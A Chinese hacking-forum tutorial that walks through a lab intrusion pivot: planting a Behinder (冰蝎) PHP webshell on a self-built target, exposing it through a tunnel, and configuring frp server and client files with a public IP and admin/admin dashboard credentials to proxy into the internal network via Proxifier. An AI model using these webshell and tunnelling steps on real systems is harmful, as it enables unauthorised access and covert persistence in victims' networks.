电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 455 人浏览分享

frp反向代理

[复制链接]
455 0
准备环境

一台靶机

一台攻击机器

一台服务器

一、搭建内网环境

1.在靶机下载安装phpstudy_pro软件

下载地址:https://www.xp.cn/download.html

QQ截图20221118103708.png

2.打开软件

3825.png

3.修改端口为56789

222209.png

4.访问url地址(http://localhost:56789/),查看是否搭建成功

2228.png

4.在其根目录www目录下上传php冰蝎3马

2226.png

2222.png

4.靶机访问url地址(http://localhost:56789/shell.php)看是否被解析

2221.png

二、建立隧道(windows演示)

1.在靶机使用命令./sunny clientid 205434289668开启隧道;linux下要赋予其最高权限chmod 777 sunny

2220.png

QQ截图20221118110206.png

2.在攻击机器使用外网环境访问url地址http://jilin.vipgz4.idcfengye.com/shell.php查看是否可以访问

2218.png

3.攻击机器使用冰蝎连接木马

三、配置frp代理

1.因靶机web环境为windows,我的服务器为linux的,所以windows和linux版本的frp都要下载
这里我将所有的全部下载了,以后会有用
下载地址:github自行查找

2216.png

2.将下载的linux版本的frp上传到服务器(所有人可访问的外网服务器)内

2212.png

3.赋予frp文件夹最高权限chmod 777 ./*

2211.png

4.配置服务器的frps.ini(切记linux版本)

[common]
bind_addr=0.0.0.0
bind_port = 7100 #服务器端口
dashboard_addr = 0.0.0.0
dashboard_port = 7500 #仪表板监听端口
dashboard_user = admin #用户名
dashboard_pwd = admin #密码

2210.png

4.执行./frps -c frps.ini 若端口被占用可杀掉(最好是在后台执行,创建screen模块,执行./frps -c frps.ini)

2209.png

5.攻击机器访问服务器ip:7500

12328.png

6.配置靶机的frp内的frpc.ini(切记weindows版本)

[common]
server_addr = 49.233.61.181 #服务器的公网IP
server_port = 7100 #服务器端口

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = #正向代理本地端口
remote_port = 6000 #正向代理服务器端口,必须保证服务端防火墙和安全组已允许该端口通过

2208.png

7.在靶机执行frpc -c frpc.ini

2206.png

8.查看攻击机器访问的服务器ip+7500,可发现已被代理出来

2202.png

9.下载Proxifier代理工具

下载地址:https://www.onlinedown.net/soft/971579.htm

2201.png

10.配置proxifier代理

2200.png

2118.png

2116.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.